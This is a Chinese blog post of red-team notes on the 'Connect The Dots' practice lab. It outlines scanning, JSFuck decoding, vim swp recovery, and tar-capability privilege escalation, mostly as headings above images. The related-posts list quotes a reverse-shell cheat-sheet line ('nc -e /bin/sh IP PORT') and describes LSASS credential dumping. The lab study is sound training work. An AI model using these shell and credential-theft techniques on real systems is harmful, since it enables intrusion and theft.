第十八篇红队笔记-百靶精讲之CONNECT THE DOTS-jsfuck(心脏图),polkit(权限),图片隐写,莫尔斯码(._图)

原创 已于 2024-06-08 00:12:45 修改 · 392 阅读 · 5 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#笔记
于 2023-12-01 09:19:20 首次发布
本文介绍了使用nmap进行信息收集,包括检查ssh(7822)和ftp/nfs渗透尝试。提到jsfuck解码,web渗透,以及如何通过获取系统立足点、vim的swp文件和tar文件获取root权限。还讨论了polkit的权限管理和systemd-run的临时高权限运行机制。

开始和nmap信息收集

  • ssh端口是7822
    在这里插入图片描述
    在这里插入图片描述

ftp和nfs渗透

  • ftp登陆失败
    在这里插入图片描述
  • nfs
    在这里插入图片描述
  • 发现morris用户
    在这里插入图片描述
  • 密码错误
    在这里插入图片描述

web渗透

在这里插入图片描述

jsfuck解码

  • http://10.0.2.14/mysite/bootstrap.min.cs
    在这里插入图片描述

获得系统立足点

  • ssh登陆
    在这里插入图片描述
  • ftp登陆
    在这里插入图片描述
  • ftp批量下载
    在这里插入图片描述

莫尔斯码解码

在这里插入图片描述

vim断电swp文件读取

  • 继续查看norris用户
    在这里插入图片描述
  • morris用户
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述

tar文件能力取得root flag

  • getcap 查询权限文件
    在这里插入图片描述
  • tar打包/root文件夹
    在这里插入图片描述
  • 发现root的flag
    在这里插入图片描述

Connect the dots渗透总结

  • 搜索文件
    在这里插入图片描述
  • 高权限运行bash时候,也能运行polkit?
  • 临时拥有文件所有者的身份执行polkit
    在这里插入图片描述

其他

关JSFuck加密介绍

  • JSFuck 只使用6种字符 []!()+来书写任何Javascript代码。当然,用这种方式写出来的代码会很长。JSFuck不需要依赖浏览器,也可以在Node.JS上运行。

关于polkit

  • 它的全称是policy key policy
  • 在llinux对于文件权限管理的一套单独的机制

关于systemd-run

  • 临时高权限运行某服务
    在这里插入图片描述
红队笔记(1):红队与渗透测试
qq_51515209的博客
11-30 2302
红队整体概念与相关名词的介绍
红队笔记3-SickOS1.1打流程解法1-穿越Squid代理的CMS渗透(vulnhub)
qq_63442530的博客
03-15 1638
1.端口扫描:发现存活端口:22 ,3128(squid-http) ,8080,其中squid-http是个代理服务器2.开始访问3128,8080都访问不到,目录扫描也扫描不出结果,根据我们知道squid是个代理服务器,尝试Dirb -p参数,挂代理目录爆破,成功扫出来一些路径。然后浏览器设置代理访问,找到了wolfcms的页面。3.通过浏览器获得wolfcms后台路径,通过弱口令登录后台,寻找后台代执行和文件上传的位置,构造反弹命令入代执行,反弹shell。
红队笔记精讲:Prime1 - 信息收集和分析能力的试炼
m0_73612768的博客
12-12 1664
本文是作者在观看 B 站《红队笔记》后做的一些笔记及相关知识的补充。学渗透特别推荐大家去看。如有侵权,请联系作者,作者看到后会第一时间删除。
红队笔记-1(主机发现,情报收集,内网信息收集)
欢迎关注微💌,不定期发布安全运维、甲方视角安全建设、乙方厂商专业安全服务内容。
12-21 6081
文章目录一. Favicon Hash 碰撞(非常好用)二. DNS域传送三. 子域名爆破四. 在线网站 搜索引擎 与 IP 反查五. 开源情报 与 搜索引擎六. whois 与 备案信息七. 真实IP识别 与 指纹识别八. SSL 证书查询 与 敏感目录九. 目标邮箱收集 与 WAF 探测 最近面试遇到很多面试官问信息收集,把以前比较乱的资料的再次整理一遍。 一. Favicon Hash 碰撞(非常好用) 找 favicon 生成hash https://github.com/Viralmaniar
红队笔记专属-shell备忘录
Gamma_lab的博客
04-02 4477
前言: ​ 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会! 最全。 反向shell-备忘录: ​ 通常在获得远程代执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来讲,反弹shell是非常有必要的,以下将从不同的工具出发, nc listen: nc -nlvp PORT connect: nc -e /bin/sh IP PORT or nc -c sh I
红队打ConnectTheDots思路详解(vulnhub)
Bossfrank的博客
09-11 1909
本文是vulnhubconnect the dots的打思路详解。这个机涉及到的知识点非常多,如果不了解的话可能无法深入探索。涵盖的知识点包括ftp渗透、nfs挂载、目录爆破、jsfuck混淆破解、文件莫尔斯、vim读取断电swp文件、getcap查看文件能力、suid提权、polkit利用与pokit权限提升漏洞利用等等。一起努力,渗透还是要实操才能进步!
红队笔记(2):信息收集(一)
qq_51515209的博客
12-01 1222
红队,信息收集,被动信息收集,Reconnaissance
红队笔记-2:JARBAS打流程(vulnhub)
qq_63442530的博客
03-15 1507
1.主机发现和端口扫描:nmap扫描发现机是192.168.200.140,和存活端口22,80,3306,8080。2.80和8080端口:从web角度入手,80端口是web,8080端口是web的后台,对其web先进行目录扫描,发现普通扫扫描没有扫描发现,尝试添加参数扫描-X,扫描后发现access.html文档,通过破解access.html页面的密文获得账号密,组合账号密登录后台成功。
红队笔记6-Prime1打流程-提权-OpenSSL解密(vulnhub)
qq_63442530的博客
03-19 1564
文章是根据场作者给出的提权通过openssl解密获得saket用户密,在saket用户sudo -l提权成功,没有使用内核提权,也是作者想让我们学习openssl解密:1.enc运行密的查找:find 找备份文件->缺少密时可以通过查找备份文件可能存有密2.密钥的处理:我们获得密钥,对其进行md5加密(md5sum)和16进制转换(od)3.openssl解密参数构造:查看openssl帮助文档,确定参数。
红队笔记之渗透测试流程以及各环节技术纲要
明光札记
11-29 4086
渗透测试流程以及技术刚要,技术细节不断完善中,欢迎收藏本文
网络安全学习笔记——红队实战攻防(上)
just do it
11-18 1377
红队主要复盘总结现有防护系统的不足之处,为后续常态化网络安全防护措施提供优化依据。在日常运维上以实战思想进一步加强安全防护措施,提高整体防守能力。
红队笔记11:pWnOS1.0打流程解法2-ssh免密登录-rsa私钥破解-shellshock提权(vulnhub)
qq_63442530的博客
04-03 1145
私钥爆破的时候其实是利用了特定版本的openssl的漏洞,只有65535种可能的私钥,这才能爆破出来,一般情况是没有这个漏洞的。shellshock漏洞我个人的理解是,cgi文件是一个bash环境文件,通过每一次的http请求cgi文件,都会转换成一次shell调用,其中在http请求包中的UA头中的数据会被cgi文件接收并执行,这也是shellshock利用中的:Attack CGI programs在红队笔记的视频中,文件泄露利用路径(auto_wordlists github上开源的敏感文件路径。
红队linux提权大全笔记(1)
anddddoooo的博客
08-31 1506
计划任务中如果没有使用绝对路径,那么会搜索path以找到计划任务脚本,而path通过顺序搜索获取脚本,那么我们在正确的path路径的前面的路径添加一个同名的脚本,计划任务就会优先搜索到新添加的脚本。通过下载密钥对库,然后将公钥对生成的密钥对进行比对,因为公钥是公开的,没有立足点也可以获取,所以通常用来打点,而不是提权(看是否是root的公钥)查找特定文件权限:(用于查找具有 SUID 位的文件,SUID 位允许文件以拥有它的帐户的权限级别运行,而不是以运行它的帐户的权限级别运行。
红队笔记10:pWnOS2.0打流程-whatweb指纹识别-searchsploit搜索漏洞利用getshell(vulnhub)
qq_63442530的博客
04-01 1419
Perl被称为"骆驼"语言。发明perl的Larry Wall就说过:“Perl可能不好看或者不好闻,但是它能完成任务”。Perl是文本处理语言,它最初就是为了这个目的设计的。Perl是网络编程语言,它内置了socket/client-server协议。Perl是系统管理语言,全球网络很多服务器上就运行着它的脚本。很多时候是单行的脚本。Perl是Web脚本编语言。至今它仍然是最流行的几种web脚本编语言之一。依次尝试参数貌似把用户名和密改成a :a了尝试登录。
红队笔记-2:JARBAS打流程(vulnhub),2024年最新vivoLinux运维面试
2401_83974370的博客
04-14 478
最全的Linux教程,Linux从入门到精通。
红队笔记-1:W1R3S: 1.0.1打流程(vulnhub)
qq_63442530的博客
03-13 1913
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
抓 Windows 密,这 7 种技术够不够用!
bigbangbangbang1的博客
12-09 1620
内网渗透中,获取到 Windows 系统权限之后,抓取本地哈希是必不可少的操作,今天分享一款工具,集成了 7 种转储 LSASS 内存的方法,工具地址:运行如:未提供任何参数运行程序,会要求你输入所要指定的方法,参数为 1-7,功能分别对应:使用解除挂钩技术转储 lsass 内存以注入修改后的 mimikatz 二进制文件。使用解除挂钩技术转储 lsass 内存以使用 MDWD 的直接系统调用注入二进制文件。使用简单的 MiniDumpWriteDump API 转储 lsass 内存。
vulnstack&红日场5(红队)学习笔记
最新发布
weixin_53884648的博客
12-09 767
红日场5学习;本次主要练习msf域内psexec横向以及对应相关命令学习。
红队笔记之内网信息搜集技术要点总结
明光札记
01-05 2750
在渗透测试中信息收集的深度与广度以及对关键信息的提取与关联,将影响渗透的质量。本文对整体技术要点进行总结。
第七红队笔记-精讲之pWnOS1.0-Authorized_keys-prng-shellshock
admin741admin的博客
06-08 612
home/vmware/.ssh/authorized_keys 是各个公钥存放的路径比如本地window 想免密直接ssh连接linux,window先本地生成id_rsa私钥和id_rea.pub公钥通过类似scp工具把id_rea.pub公钥上传目标linux的.ssh/authorized_keys目录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值